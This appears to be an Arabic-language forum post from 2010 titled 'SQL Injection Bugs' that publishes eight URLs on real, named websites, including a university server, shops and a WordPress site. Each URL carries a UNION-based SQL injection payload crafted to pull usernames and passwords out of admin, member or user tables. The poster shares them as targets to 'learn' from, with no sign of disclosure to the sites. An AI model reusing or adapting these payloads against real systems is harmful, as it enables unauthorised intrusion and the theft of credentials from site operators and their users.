السَلام على الأهل و الأحباب
الأهل العاشق لكل ما هو جديد و الحبيب الطَموح لنيل كل ماهو حصري و جليل
SQL Injection Bugs. By spammeuR
I've found bugs on those sites. hope you'll learn something =) here's sites
كود PHP:
http://140.119.61.161/blog/forum_detail.php?id=1256+union+select+1,2,3,concat(nick_name,0x3a,pwd),5,6+from+member--
http://www.usedcarlease.com/item.php?id=-1+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(username,0x3a, password)+from+account+limit+0,1--
http://nano.stanford.edu/model.php?id=-1+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+from+manage_adm ins+limit+0,1--
http://www.ijsselpoint.nl/website.php?id=7+and+1=0+union+select+concat(username,0x3a,pwd)+from+user+limit+0,1--
http://www.bagdatevcil.com/?p=urun&id=-1+and+1=0+union+all+select+concat(username,0x3a,password),2+from+uyeler+limit+0, 1--
http://www.jornalediferente.com.br/noticias.php?id=-1+and+1=0+union+select+1,concat(user_login,0x3a,user_pass),3,4,5,6+from+wp_users --
http://animaterasu.amaterasuheritage.com/?pg=anime&id=-1+and+1=0+union+all+select+1,2,concat(login,0x3a,senha)+from+animaterasu_usuario --
http://www.cbfcomponents.com/cbf/services.php?id=-1+and+1=0+union+select+1,concat(admin_userid,0x3a,admin_password),3,4,5+from+tbl _admin--
04-10-2010, 11:31 AM
SQL Injection Bugs
العرض العادي
